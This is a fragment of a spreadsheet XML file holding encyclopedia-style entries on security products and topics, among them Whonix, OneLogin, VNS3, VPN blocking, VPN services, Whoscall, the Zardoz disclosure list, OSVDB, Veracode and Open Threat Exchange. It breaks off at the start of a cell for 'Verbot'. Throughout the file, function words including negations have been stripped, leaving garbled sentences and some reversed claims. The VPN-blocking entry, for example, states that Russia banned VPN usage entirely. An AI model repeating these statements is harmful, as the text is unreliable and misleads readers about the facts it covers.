2019 cybersecurity excellence awards, including best cybersecurity company best insider threat solution cerebral insider threat intelligence platform.in 2022, veriato cerebral received pcmag editor’s choice award best employee monitoring software complex threat detection. users awareness technologies products interguard software suite used technology companies, financial services, health care organizations industries. interguard gives administrators ability monitor activities remote employees work corporate domain. references</t>
  </si>
  <si>
    <t>Whonix</t>
  </si>
  <si>
    <t>whonix hoo-niks) kicksecure–based security hardened linux distribution. main goals provide strong privacy anonymity internet. operating system consists virtual machines, "workstation" "gateway", running debian gnu/linux. communications forced network.both whonix kicksecure comprehensive documentation spans basic operating system maintenance advanced topics. history first iteration, torbox (february-july 2012) initial concept announced developer proper. idea leverage virtual machine acting transparent proxy route internet traffic network. this would allowed mask one's address, prevent leaks avoid configure proxy settings individual applications ones support them).torbox beginning guide released project website also provided shell scripts. other contributors provided information torbox became popular.as project's complexity grew, leak tests became increasingly necessary. some contributors developed utilities automatize many steps improve user-friendliness. nonetheless, maintaining build instructions torbox simultaneously updating shell scripts became much burden developers, decided drop manual creation instructions, migrating focusing exclusively shell scripts.even then, complexity still growing additional features changes line security research. march 2012 release torbox's 0.1.3, programmers agreed completely automatize build process improving codability change developing process, brought website better capabilities project's wiki.the torbox/aos wiki listed seven released versions. with advent third release, proper released public-key containing contact information,the sixth version first rename developer proper adrelanos. however, former username maintained website seventh final version.development torbox continued version 0.2.1, release july 2012. project renamed following day. rename (july-september 2012) andrew lewman (then project executive director) privately advised adrelanos rename project, stating even torbox mentioned website unaffiliated project, still mistaken people. adrelanos renamed project aos, acronym "anonymous operating system".no releases made name aos. final rename continued development whonix (september 2012-present) choice name quickly regretted described "sub-optimal" adrelanos. noted search engines return relevant results name shared many acronyms. secondary reason project's name non-capitalized, would made incompatible grammatical convention capitalizing word beginning sentence.adrelanos posted request suggestions tor-talk mailing list. original idea name would made purpose anonymous operating system clear time avoiding confusion trademark issues. nick mathewson, project's co-founder debated idea self-explanatory name, stating "doing okay" even without particularly descriptive name.while many suggestions sent, adrelanos concluded post announcing name, whonix, publishing signed message final decision project's website. reasoned name unused would provided results search engines. whonix compound words: ("what person/s") german word means "nothing").whonix 0.3.0, never released, based ubuntu. while ubuntu praised technical perspective, potential trademark issues would complicated distribution along potential revocation license canonical. complying terms requested rebranding would required work beyond capability whonix developers. moreover, release ubuntu 12.10 heavily criticized closer integration amazon ecosystem privacy issues.the whonix project recognized privacy issues would caused problem ubuntu, recommended using even host machine.the first release name whonix happened version 0.4.4, first since torbox 0.2.1. rebased debian described project good compromise security usability".the second release, whonix 0.4.5 first announced adrelanos tor-talk mailing list.in blog post published january 2014 whonix wiki, adrelanos decided give pseudonymity using first time real name, patrick schleizer. schleizer, german citizen stated burden maintaining operational security. also, mentioned germany persecuting citizens criticizing government, concluding remark importance speaking public taking action. porting qubes august 2014 user called whonixqubes announced qubes-users mailing list first successful integration qubes version r2-rc2 whonix 8.2. joanna rutkowska, founder qubes publicly stated praise efforts.in june 2015, rutkowska announced reception funding open technology fund sponsor porting work whonix qubes proposal made initially september 2014, rutkowska approached michael carbone, employee access member qubes team helped process.at time, patrick schleizer wrote wanting personally focus development qubes-whonix.with release qubes r3.0 october 2015, whonix templates officially became available. variants standalone standard version whonix used many different platforms host-machines, windows, macos, gnu/linux qubes downloadable formats compatible common hypervisors like virtualbox, qemu, xen. whonix reported experimental compatibility vmware hyper-v, though officially supported.the virtualbox packages workstation gateway distributed xfce desktop environment headless "cli" version. they seamlessly combined. qubes whonix configured directly qubes installation menu since version r3.0. since least qubes r4.0 also installed later time using management software salt dom0. design "advanced" configuration uses physically separate computers, gateway running hardware computers, workstation running hosted second. this protects attacks hypervisors cost flexibility. supported physical hardware platforms include raspberry unofficial community efforts powerpc workstation hardware, talos, raptor computing.on first startup, runs check ensure software date. every boot, date time using sdwdate secure time daemon works tor's protocol.the gateway responsible running tor, virtual network interfaces. connected outside internet host, used communicate relays. connected virtual runs entirely inside host. workstation runs user applications. connected internal virtual lan, directly communicate gateway, forces traffic coming workstation pass network. workstation "see" addresses internal lan, every whonix installation. user applications therefore knowledge user's "real" address, access information physical hardware. order obtain information, application would find "break out" subvert gateway (perhaps gateway's linux kernel). browser pre-installed workstation modified version mozilla firefox provided project part browser package. this browser changed reduce amount system-specific information leaked servers. since version like tails, whonix supports optional "amnesiac" live-mode. this combines best worlds allowing tor's entry guard system choose long-lived entry points network gateway, reducing adversaries' ability trap users running malicious relays, rolling back trusted state. some precautions host needed avoid data written disk accidentally. grub-live, additional separate project, aims allow bare-metal debian hosts boot live session, avoiding forensic remnants disc. additional testing confirm efficacy package needed yet.for best defense malicious guards, recommended boot gateway pristine state unique guard paired user activity. users would take snapshot able switch guard consistently. this setup guarantees activities user remain protected malicious entry guards increasing risk running completely amnesiac system would. scope anonymity complex problem many issues beyond address masking necessary protect user privacy. whonix focuses areas provide comprehensive solution. some features: kloak keystroke anonymization tool randomizes timing presses. keystroke biometric algorithms advanced point viable fingerprint users based soft biometric traits extremely high accuracy. this privacy risk masking spatial information—such address tor—is insufficient anonymize users. tirdad linux kernel module overwriting isns. initial sequence numbers fine-grained kernel timer data, leaking correlatable patterns activity non-anonymous system traffic. they otherwise side-channel long running crypto operations. disabled timestamps timestamps leak system clock info millisecond aids network adversaries tracking systems behind nat. sdwdate secure time daemon alternative uses trustworthy sources benefits tor's end-to-end encryption. suffers easy manipulate surveil. flaws also discovered clients. software filesystems extraneous information who, what, how, documents media files created. strips information make file sharing safer without divulging identifying information source. lkrg linux kernel runtime guard (lkrg) linux security module thwarts classes kernel exploitation techniques. hardening guest makes difficult adversaries break hypervisor deanonymize user. documentation whonix wiki includes collection operational security guides tips preserving anonymity online. additionally, number original content guides security tools use, tools, added time. this includes access freenet networks tor. also tails (operating system) qubes references external links official website whonix distrowatch</t>
  </si>
  <si>
    <t>OneID</t>
  </si>
  <si>
    <t>oneid digital security service based redwood city, california. oneid sells digital identity system claims provide security across devices using public cryptography instead passwords. technology utilized non-profits, salsa labs, increase frequency security online donations. history company founded 2011 serial entrepreneur, steve kirsch. kirsch recruited engineers fenton, adam back, bobby beckmann create flagship product, launched early 2012. following launch, company raised us$7 million venture capital financing menlo park-based venture capital firm khosla ventures.following series alex doll took position ceo. doll previously executive-in-residence khosla ventures, founding executive corp. with doll's appointment founder kirsch moved role. shirish sathaye, general partner khosla ventures jonathan heiliger added oneid's board directors. following growth period late 2013, company appointed kirsch ceo.in 2014, fast company named oneid innovative companies finance.in august 2016, oneid acquired neustar. also factor authentication references external links official website</t>
  </si>
  <si>
    <t>OneLogin</t>
  </si>
  <si>
    <t>onelogin, inc. cloud-based identity access management (iam) provider designs, develops, sells unified access management (uam) platform enterprise-level businesses organizations. founded 2009 brothers thomas pedersen christian pedersen. history onelogin founded 2009 francisco thomas christian pedersen. brothers involved on-demand help desk application, zendesk, launching onelogin. onelogin officially launched 2010.in 2019, onelogin made several significant hires executive leadership team including appointing rick barr chief operating officer, dayna rothman chief marketing officer, vanessa pegueros chief trust security officer.onelogin acquired october 2021 identity. acquisitions partnerships december 2015, onelogin acquired diego-based cafésoft, provider on-premise access management (wam) software. technology enables onelogin extend single sign-on applications running on-premises. june 2016, onelogin acquired santa clara, california-based portadi, cloud-based password management tool. november 2016, onelogin acquired london-based sphere secure workspace, software vendor container technology runs mobile devices. june 2017, onelogin acquired auckland, zealand-based thisdata, cloud security company specializing account takeover detection recognition 2015: forrester research ranked onelogin vendor forrester wave cloud identity access management. march 2016: onelogin named "fast privately held internet security, networking, storage companies securities llc. april 2016: onelogin named fortune's workplaces area april 2017: fortune's workplaces area august 2019: onelogin's brad brooks recognized top-50 saas ceo. november 2019: gartner peer insights customers' choice access management 2019. march 2020: cyber defense magazine's infosec awards 2020 most innovative trusted experience platform️. october 2020: onelogin wins "remote work security innovation year" designation 2020 remotetech breakthrough awards program. november 2020: onelogin recognized leader gartner's magic quadrant access management. august 2021: onelogin recognized leader forrester wave: identity service (idaas) enterprise, 2021. security august 2016, onelogin reported unauthorized user gained access standalone systems, storage analytics." single user accessed service month more, able secure notes unencrypted. remediate, onelogin fixed cleartext logging bug, locked access management system, reset passwords.on 2017, onelogin detected stopped unauthorized access data region. alvaro hoyos, chief information security officer onelogin, reported, threat actor used keys gain access platform intermediate host another, smaller service provider us." also list single sign-on implementations references external links official website</t>
  </si>
  <si>
    <t>VNS3</t>
  </si>
  <si>
    <t>vns3 software-only virtual appliance allows users control access network topology secure data motion across public private clouds. vns3 virtual router, switch, firewall, protocol re-distributor, ssl/ipsec concentrator. network virtualization software creates customer controlled overlay network underlying network backbone. uses vns3 network routing security virtual appliance lets extend networks public, private, hybrid clouds vns3 lets enterprise data center administrators "create encrypted virtual machines private cloud, well encrypted across multiple public clouds." history developers cohesive networks first named multi-sourced infrastructure concept "v-cube-v." software internal production starting 2007. company named early commercial version vns3 "vpn3" "vpn-cubed" later renamed software vns3 2012.amazon services users first began downloading vpn-cubed partner directory december 2008. vns3 gained popularity vpn-cubed) part amazon services public cloud ecosystem independent reviews zdnet, high scalability, infoq, chris hoff, cloudave.in 2012, developers cohesive networks released major version update. release updated software rebranded vns3 (vns-cubed). research analyst william fellows wrote "vns[3] vpns hence name change since overlays within cloud, clouds, private datacenter cloud clouds), multiple datacenters."in 2013, cohesive networks released 3.0.1 version product, well free edition vns3 amazon services. vns3 recognized annual international datacenters awards winner public cloud services infrastructure award early 2014 vns3 released major software updates integration docker docker's open-source virtualization platform added ability networking applications containers inside vns3 virtual machines. users create overlay network substrate layer network application services things like proxy, reverse proxy, termination, content caching network intrusion detection" william fellows writes.in early 2015 company renamed cohesive networks emphasize networking capabilities vns3 spin less successful part business. company later announced line vns3-based products, including vns3:turret application segmentation controller, vns3:ms network management platform, vns3:ha high availability on.after 2008, vns3 became available public cloud providers geographic regions, including amazon services ec2, gogrid, flexiant, softlayer, google compute engine, cloud services, mircorsoft azure, centurylink cloud. software vns3 software creates ipsec tunneling connections similar site site vpn. connections ensure single connection virtual cloud environments vns3 gives secure access cloud assets, extends virtual segmentation, isolation, security cloud provider's network.the first vns3 built customized ubuntu-based linux using open source networking applications openswan openvpn. development team chose openvpn "primarily uses standard openssl encryption, runs multiple operating systems require kernel patching additional modules." vns3 managers virtual machines gateway virtual machines cloud infrastructure. vns3 synchronizes cloud managers using rabbitmq. vns3 enables users turn multicast order work public clouds, allowing software configurations dependent multicast function cloud.vns3 software creates ipsec tunneling connections similar site-to-site vpn. connections ensure single network multiple cloud environments. vns3 secures connections cloud deployments, extends virtual segmentation, ensures network isolation security cloud provider's virtual environment. vns3 web-based traditional linux system command line interface. vns3 uses ruby script ruby language binding.the developers earned patent underlying cloud technologies 2010. availability vpn-cubed available amazon services cloud since december 2008.according cohesive networks website, vns3 delivered virtual machine available public clouds including: amazon services, microsoft azure, google compute engine, elastichosts, softlayer, centurylink cloud. private clouds availability includes: abiquo, eucalyptus, openstack; virtual infrastructures xen, vmware, kvm, citrix. pricing since october 2008, vns3 available free amazon services microsoft azure, centurylink cloud. additional paid editions listed cohesive networks website. release history references external links official website</t>
  </si>
  <si>
    <t>VOMS</t>
  </si>
  <si>
    <t>voms acronym used virtual organization membership service grid computing. structured simple account database fixed formats information exchange features single login, expiration time, backward compatibility, multiple virtual organizations. database manipulated authorization data defines specific capabilities roles users. administrative tools used administrators assign roles capability information database. command-line tool allows users generate local proxy credential based contents voms database. this credential includes basic authentication information standard grid proxy credentials contain, also includes role capability information voms server. voms-aware applications voms data make authentication decisions regarding user requests. voms originally developed european datagrid enabling grids e-science projects maintained italian national institute nuclear physics (infn). voms also acronym voucher management system used providing recharge management services prepaid systems telecom service providers. typically external voucher management systems used intelligent network based prepaid systems. also shibboleth references external links voms voms website voms attribute certificate format standard open grid forum. infn italian national institute nuclear physics</t>
  </si>
  <si>
    <t>VPN blocking</t>
  </si>
  <si>
    <t>blocking technique used block encrypted protocol tunneling communications methods used virtual private network (vpn) systems. often used large organizations national governments corporations, tool computer security internet censorship preventing vpns bypass network firewall systems. description blocking access done different ways. ports used common tunneling protocols, pptp l2tp, establish connections transfer data closed system administrators prevent certain networks. similarly, service prohibit access blocking access addresses address ranges known belong providers. some governments known block access overseas addresses, since involve connecting remote hosts operate government's jurisdiction.as organizations ramped efforts block access bypasses firewalls, providers responded utilizing sophisticated techniques make connections less conspicuous. instance, chinese government began using deep packet inspection identify protocols, firm golden frog began scrambling openvpn packet metadata popular vyprvpn service attempt avoid detection. government china chinese internet users started reporting unstable connections 2011 using vpns connect overseas websites services apple store. universities businesses began issuing notices stop using tools circumvent firewall. late 2012, companies providing services claimed great firewall china became able "learn, discover block" encrypted communications methods used number different systems. 2017, telecommunications carriers china instructed government block individuals' vpns february 2018. iran government iran began blocking access non-government sanctioned vpns march 2013, months prior 2013 elections, "prosecute users violating state laws" "take offenders national courts supervision judiciary service". vpns approved government reportedly surveillance inspection private data. russia july 2017, state duma passed bill requiring internet providers block websites offer vpns, order prevent spreading "extremist materials" internet. it's unclear exactly russia plans implement regulation; though seems like federal security service (fsb) isps tasked identifying cracking vpns. november, 2017 made clear russia banned usage entirely. usage banned attempting access sites already blocked roskomnadzor russia's governing body telecommunications mass media communications. using business personal reasons access legal sites russia permitted.russia banned various service providers 2021. forced google delist websites even russians continue download vpns. syria government syria activated deep packet inspection uprising 2011 order block connections. censorship targeted different protocols like openvpn, l2tp pptp. pakistan government pakistan issued notice providers register ips, otherwise service blocked like china. turkey attempt curb social media citizen, government turkey considered complete apps. nationalist movement party proposed bill covering july 2020. blocking online services hulu attempt stop unauthorized access users outside hulu began blocking users accessing site addresses linked services april 2014. however, company also restricted access legitimate u.s.-based users using vpns security reasons. providers vikingvpn, nordvpn torguard stated would seek ways address issue customers speaking directly hulu resolution rolling dedicated addresses, respectively. netflix netflix came pressure major film studios september 2014 block access, 200,000 australian subscribers using netflix despite available australia. access netflix has, like streaming services, allowed users view content securely country. netflix users also used vpns means bypassing throttling efforts made service providers verizon. also important note vpns might slow internet connection trying stream netflix; however, cases using might improve connection user's throttling netflix traffic. june 2018, netflix proxy still active. netflix, reed hastings made comment 2016 market whole; “it’s small quite vocal minority. it’s really inconsequential us.” iplayer started blocking users connecting vpns october 2015. able detect connections monitoring number simultaneous connections coming address. number connections becomes abnormal block future connections offending address. iplayer remains unavailable licence holders connecting countries. said "interested able allow licence payers access iplayer holiday, welcome european union regulation help make feasible." also deep packet inspection steganographic tunnel references</t>
  </si>
  <si>
    <t>VPN service</t>
  </si>
  <si>
    <t>virtual private network (vpn) service provides proxy server help users bypass internet censorship geoblocking users want protect communications data profiling mitm attacks hostile networks. wide variety entities provide "vpns" several purposes. depending provider application, always create true private network. instead, many providers simply provide internet proxy uses technologies openvpn wireguard. commercial services often used wishing disguise obfuscate physical location address, typically means evade internet censorship geo-blocking. providers often market services privacy-enhancing, citing security features, encryption, underlying technology. however, users must consider transmitted content encrypted entering proxy, content visible receiving endpoint (usually service provider's site) regardless whether tunnel encrypted inter-node transport. secure participants oversight ends entire data path content encrypted enters tunnel. client side, configurations intended services proxies conventional configurations. however, typically utilize operating system's interfaces capture user's data send proxy. this includes virtual network adapters computer oses specialized "vpn" interfaces mobile operating systems. less common alternative provide socks proxy interface. computer magazines, services typically judged connection speeds; privacy protection, including privacy signup grade encryption; server count locations; interface usability; cost. order determine degree privacy anonymity, various computer magazines, world magazine, also take provider's guarantees reputation among news items consideration.users commonly exposed misinformation services market, makes difficult tell apart vague bold claims facts advertisements. criticism limitations services criticized various grounds scott. york times noted user reconsider whether service worth money. services sufficient protection browser fingerprinting. techradar noted privacy reasons independent provider recommended. legality march 2018, unapproved services banned china, used circumvent great firewall. operators received prison sentences penalized fines.russia banned various service providers 2021.russia forcing google delist websites, 400,000+ russians downloading vpns daily. comparison commercial virtual private network services definitions following definitions clarify meaning column headers comparison tables below. privacy magazine recommends users consider choosing provider based country data retention laws, since makes easier service keep promise logging.pc magazine techradar also suggest users read provider's logging policy signing service, since providers collect information customers' usage.pc world recommends users avoid free services rule thumb, asserts free services either sell users' browsing data aggregated form researchers marketers, offer minimal amount data transfer month. logitheque explains many comparison websites web. notes technical features notes availability encryption notes references</t>
  </si>
  <si>
    <t>Whoscall</t>
  </si>
  <si>
    <t>whoscall mobile application features caller identification service. developed gogolook co., ltd., taiwanese design team. used million users worldwide, whoscall identifies incoming calls, blocks scam/harassment numbers, filters spam text messages. name derived shorter version "who calling?" available countries/regions, including taiwan, korea, hong kong, japan, thailand, malaysia, brazil. application owns largest number database southeast asia. strategic partner several governmental agencies anti-fraud efforts, including national police agency (taiwan), financial supervisory service (south korea), fukuoka city government., police cyber taskforce (thailand). history development 2010, first version whoscall created co-founders, jeff kuo, received spam call. developed together jeff kuo, jackie chang, reiny song part-time work. afterwards, three co-founded gogolook, goal enhancing fraud prevention efforts worldwide providing caller identification solution.in august 2010, first version whoscall released google play several countries attracted voluntary downloads. 2011, whoscall gained traction propelled limelight google’s ceo, eric schmidt visit taiwan, rated app: called whoscall tells strange number from. it's growing fast u.s., india, china, made taiwan.” 2013, gogolook received investment $11.7 million naver corporation, line’s parent company. 2013, google play taiwan awarded whoscall 2013 innovation awards. year, whoscall awarded google play’s best apps year taiwan, hong kong, singapore, philippines, malaysia, indonesia, vietnam, thailand. 2014, whoscall version launched store. 2015, whoscall awarded store’s best apps 2015. 2015 2016, whoscall awarded google play’s best apps year consecutive years. 2016, whoscall signed taiwan’s national police agency strengthen anti-fraud efforts help promote anti-fraud education. 2016, whoscall million users worldwide. 2017, whoscall signed financial supervisory service (south korea) korean national police agency anti-fraud technical exchange. 2017, whoscall chosen google successful case study event google 2017. 2019, taiwan president tsai ing-wen visited gogolook, developer whoscall. 2019, whoscall million users worldwide. 2020, gogolook, developer whoscall, established overseas office fukuoka, japan created partnerships fukuoka city government joint anti-fraud efforts. 2020, whoscall released world’s first covid-19 scam white paper. release covered several media outlets. 2020, application taiwan’s presidential innovation award, recognition achievements. 2020, gogolook received investment semiconductors corp., largest gaas semiconductor foundry world. 2021, whoscall listed anti-fraud apps recommended royal thai police. 2021, whoscall released 2020 annual report focusing latest fraud trends industry insights. features instant caller identification, identifies unknown callers real time largest number database (with billion entries) ai-powered identification engine. caller blocking, reduces risks receiving malicious/harassment phone calls blocking nuisance calls text messages automatically. message filtering, filters dangerous phishing text messages detecting suspicious urls keywords. unknown caller query, allows users unknown phone numbers manually identify callers database. number reporting, maximizes power social network allowing users report dangerous/scam phone numbers. accolades reception whoscall covered prominent international media including techcrunch, techinasia, e27. highly regarded overwhelming positive reviews holds average star ratings google play store. anecdote 2014, gogolook mentioned name president taiwan, ying-jeou's national address marking year office. gogolook referred example creativity potential youth taiwan.in april 2014, concerns regarding whoscall’s privacy issues rose forefront national attention public figures took press expressed public records including home telephone numbers addresses showing incoming calling screens. gogolook swiftly came statement declaring never collected stored personal information servers, alone made publicly available. soon discovered personal information aforementioned public figures leaked government servers poor security protocols made information available search engines, gogolook sources information. whoscall promptly lauded call screen telemarketers, also reliable reminder possible dissemination personal information. references reason imperative discover called</t>
  </si>
  <si>
    <t>CWG (repurposing company)</t>
  </si>
  <si>
    <t>cwg, also known communications wireless group, (formerly wireless group), global repurposing source wireless industry specializes recycling reuse cell phones, smartphones associated accessories. history operations founded 2006, headquartered bohemia, york, company markets leading recycler mobile handsets serving telecommunications industry. company promotes sustainable business model built around concept reuse maintains strict zero-landfill policy. company works carriers manufacturers mobile devices provides variety reclamation services repair, refurbishment, secure data erasure, resale, take-back programs, safe disposal.the reclamation practices used company harvest component level salvage reusable materials, precious metals, plastic glass. repairs made refurbished parts wherever possible, disposals performed environmentally responsible manner.in united states, estimated million cell phones thrown away year, creating 65,000 tons electronic waste every year. however, repurposing mobile handsets keeps electronic waste down, reduces greenhouse emissions, keeps toxic metals plastics landfills, conserves natural resources.the company processes million accessories million batteries annually; reclaims, tests delivers 100,00 parts month; kept million pounds phone scrap landfills; recycles verizon wireless's hopeline program, benefits supports victims domestic violence. also economy long island electronic waste united states list york companies references external links cwg.com, company's official website</t>
  </si>
  <si>
    <t>Zardoz (computer security)</t>
  </si>
  <si>
    <t>computer security, zardoz list, formally known security-digest list, famous semi-private full disclosure mailing list neil gorsuch 1989 1991. identified weaknesses systems gave directions find them. zardoz notable status perennial target computer hackers, sought archives list information undisclosed software vulnerabilities. membership restrictions access zardoz approved case-by-case basis gorsuch, principally reference user account used send subscription requests; requests approved root users, valid uucp owners, system administrators listed nic.the openness list users unix system administrators regular topic conversation, participants expressing concern vulnerabilities exploitation details disclosed list liable spread hackers. hand, circulation zardoz postings among computer hackers open secret, mocked openly famous phrack parody channel populated notable security experts. notable participants keith bostic discussed sendmail vulnerabilities chip salzenberg discussed peter honeyman's posting uucp worm, shell script security gene spafford discussed ultrix bugs, relayed enforcement enquiries morris worm christiansen discussed suid shell scripts chris torek discussed devising exploits general descriptions vulnerabilities henry spencer discussed unix security brendan kehoe discussed systems security alec muffett announced crack, famous unix password crackerthe majority zardoz participants unix systems administrators software developers. neil gorsuch gene spafford prolific contributors list. references external links security-digest archive project</t>
  </si>
  <si>
    <t>BBC Own It</t>
  </si>
  <si>
    <t>british software application hardware package designed protect support children using internet. consists custom keyboard companion app. keyboard uses machine learning assess, intervene provide inline help recognises bullying, hate, toxicity, data privacy emotions. companion provides insights feedback user using device. videos, articles quizzes presented allow children learn develop understanding actions directly affect wellbeing. features keyboard gives real-time feedback sentiment users type. this provides sense intended recipient message feel upon receipt. keyboard intervenes help identifies safeguarding issue.all machine learning business logic encapsulated within app. there cloud service, ensuring strict data privacy. autocorrect, autocomplete next-word prediction features built focus language children. history 2016, royal foundation duke duchess cambridge established royal foundation taskforce prevention cyberbullying. work began 2017 response call action taskforce.in december 2017, launched november 2018, work announced prince william. september 2019, launched appstore google play. awards uxuk award best education learning experience (2019) banff world media festival rockies award children youth interactive content (2020) cogx award best innovation natural language processing (2020) external links references</t>
  </si>
  <si>
    <t>Ambient authority</t>
  </si>
  <si>
    <t>ambient authority term used study access control systems. subject, computer program, said using ambient authority needs specify names involved object(s) operation performed order permitted action succeed.in definition, "name" referring object include authorising information, could potentially used subject; action "permitted" subject exists request subject could make would cause action carried out.the authority "ambient" sense exists broadly visible environment (often, necessarily global environment) subject request name. example, suppose program opens file read access executing call: open("filename", o_rdonly, desired file designated name filesystem, include authorising information, program exercising ambient authority. when ambient authority requested, permissions granted denied based global properties executing program, identity role. cases, management access control handled separately explicit communication executing program process, means access control lists associated objects role-based access control mechanisms. executing program means reify permissions granted specific purpose first-class values. program able access object acting behalf acting behalf clients (or, behalf client another), express intention. this inevitably leads programs subject confused deputy problem. term "ambient authority" used primarily contrast capability-based security (including object-capability models), executing programs receive permissions might receive data, communicated first-class object references. this allows determine permissions came from, thus avoid confused deputy problem. however, since additional requirements system considered capability system besides avoiding ambient authority, "non-ambient authority system" synonym "capability system". ambient authority dominant form access control computer systems today. user model access control used unix windows systems ambient authority model programs execute authorities user started them. this means executing programs inevitably given permissions (see principle least privilege) need task, unable determine source number types permission have. program executing ambient authority access control model little option designate permissions exercise them, hoping best. this property requires excess permissions granted users roles, order programs execute without error. references</t>
  </si>
  <si>
    <t>Open Source Vulnerability Database</t>
  </si>
  <si>
    <t>open sourced vulnerability database (osvdb) independent open-sourced vulnerability database. goal project provide accurate, detailed, current, unbiased technical information security vulnerabilities. project promoted greater open collaboration companies individuals. database's motto "everything vulnerable".the core osvdb relational database tied various information security vulnerabilities common, cross-referenced open security data source. december 2013, database cataloged 100,000 vulnerabilities. while database maintained 501(c)(3) non-profit public organization volunteers, data prohibited commercial without license. despite that, many large commercial companies used data violation license without contributing employee volunteer time financial compensation. history project started august 2002 blackhat conferences several industry notables (including moore, rain.forest.puppy, others). under mostly-new management, database officially launched public march 2004. original implementation written forrest (fbr). later, entire site re-written ruby rails david shettler. open security foundation (osf) created ensure project's continuing support. jake kouns (zel), chris sullo, kelly todd (aka lyger), david shettler (aka d2d), brian martin (aka jericho) project leaders osvdb project, held leadership roles various times. april 2016, database shut down, blog initially continued brian martin. reason shut ongoing commercial uncompensated security companies.as january 2012, vulnerability entry performed full-time employees risk based security, provided personnel work order give back community. every entry included full title, disclosure timeline, description, solution known), classification metadata, references, products, researcher discovered vulnerability (creditee). process originally, vulnerability disclosures posted various security lists sites entered database entry data mangler (ndm) queue. entry contained title links disclosure. stage page entry contain detailed description vulnerability associated metadata. time permitted, entries analyzed refined, adding description vulnerability well solution available. this general activity called "data mangling" someone performed task "mangler". mangling done core casual volunteers. details submitted volunteers reviewed core volunteers, called "moderators", refining entry rejecting volunteer changes necessary. information added entry approved available anyone browsing site. contributors some people volunteered maintained osvdb: jake kouns (officer osf, moderator) chris sullo (officer osf, moderator) brian martin (officer osf, moderator) kelly todd (officer osf, moderator) david shettler (officer osf, developer) forrest (developer)other volunteers helped past include: steve tornio (moderator) alexander koren (mangler) travis schack (mangler) susam (mangler) christian seifert (mangler) zain memon references external links osvdb blog risk based security</t>
  </si>
  <si>
    <t>Veracode</t>
  </si>
  <si>
    <t>veracode application security company based burlington, massachusetts. founded 2006, company provides saas application security integrates application analysis development pipelines. veracode provides multiple security analysis technologies single platform, including static analysis white-box testing), dynamic analysis black-box testing), software composition analysis. company serves 2,500 customers worldwide and, february 2021, assessed trillion lines code. history veracode founded chris wysopal christien rioux, former engineers @stake, cambridge, massachusetts-based security consulting firm known employing former “white hat” hackers l0pht heavy industries. much veracode's software written rioux. 2007, company launched securityreview, service used test code order find vulnerabilities could lead cybersecurity breaches hacking. service intended used alternative penetration testing, involves hiring security consultant hack system. november 2011, company announced appointed robert brennan, former iron mountain incorporated, chief executive officer.as 2014, veracode's customers included three four banks fortune 100. fortune reported march 2015 veracode planned file initial public offering (ipo) later year order public. however, occur. funding round announced september 2014, firm raised us$40,000,000 late-stage investment wellington management company participation existing investors.in company's annual cybersecurity report 2015, found sectors failed industry-standard security tests mobile applications government worst performing sector regards fixing security vulnerabilities. this annual report also found "four five applications written popular scripting languages contain least critical risks industry-standard security benchmark."on march 2017, technologies announced acquiring veracode approximately $614 million cash, acquisition completed april 2017.on july 2018, broadcom announced acquiring veracode parent technologies $18.9 billion cash. acquisition completed november 2018, broadcom thus became owner veracode business. day, thoma bravo, private equity firm headquartered francisco, california, announced agreed acquire veracode broadcom $950 million cash.in 2019, king became ceo.veracode’s 2020 annual cybersecurity report found half application security flaws remain open months discovery. 2020, veracode scanned trillion lines code, helping correct approximately million flaws. reception 2013, veracode ranked 20th forbes list most promising companies america. veracode named coolest cloud security vendors 2014 cloud 100" magazine. gartner named veracode leader eight consecutive years (2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021) gartner magic quadrant application security testing. veracode also received highest scores enterprise public-facing applications gartner critical capabilities application security testing. october 2020, company recognized gartner peer insights 2020 customers’ choice application security testing. that year, company also named gold winner cybersecurity excellence awards’ software category. also 2020, company honored commonwealth institute boston globe women-led software business massachusetts. 2021, veracode named leader forrester wave: static application security testing, 2021 first-place trustradius’ 2021 best appsec feature best appsec customer support categories. products veracode provides multiple software security analysis technologies single saas platform, including static analysis white-box testing), dynamic analysis black-box testing), software composition analysis, prevent software vulnerabilities like cross-site scripting (xss) injection. february 2020, veracode launched devsecops veracode security labs. july 2020, veracode released free edition veracode security labs accessible anyone. also list tools static code analysis references further reading millman, gregory (july 2013). "boards need know risk outsourced software". wall street journal. retrieved october 2016. (subscription required)</t>
  </si>
  <si>
    <t>Open Threat Exchange</t>
  </si>
  <si>
    <t>open threat exchange (otx) crowd-sourced computer-security platform. 180,000 participants countries share million potential threats daily. free use.founded 2012, created alienvault (now at&amp;t cybersecurity), developer commercial open source solutions manage cyber attacks. collaborative threat exchange created partly counterweight criminal hackers successfully working together sharing information viruses, malware cyber attacks. components cloud-hosted. information sharing covers wide range issues related security, including viruses, malware, intrusion detection firewalls. automated tools cleanse, aggregate, validate publish data shared participants. data validated platform stripped information identifying participating contributor.in 2015, added social network enables members share, discuss research security threats, including real-time threat feed. users share addresses websites attacks originated look specific threats anyone already left information.users subscribe “pulse,” analysis specific threat, including data ioc, impact, targeted software. pulses exported stix, json, openloc, maec csv, used automatically update local security products. users up-vote comment specific pulses assist others identifying important threats.otx combines social contributions automated machine-to-machine tools integrates major security products firewalls perimeter security hardware. platform read security report .pdf, .csv, .json open formats. relevant information extracted automatically, assisting professionals readily analyze data.specific components include dashboard details malicious around world check status specific ips; notifications organization's domain found hacker forum, blacklist listed otx; feature review files determine communication known malicious ips.in 2016, alienvault released version allowing participants create private communities discussions groups share information threats within group. feature intended facilitate in-depth discussions specific threats, particular industries, different regions world. threat data groups also distributed subscribers managed service providers using otx." technology data platform integrates natural language processing machine learning facilitate collection correlation data many sources, including third-party threat feeds, websites, external local agents. partners 2015, alienvault partnered intel coordinate real-time threat information otx. similar deal hewlett packard announced year. competitors both facebook threat exchange platforms. facebook threatexchange beta requires application invitation join. launched x-force exchange april 2015. references</t>
  </si>
  <si>
    <t>Verbot</t>
  </si>
  <si>
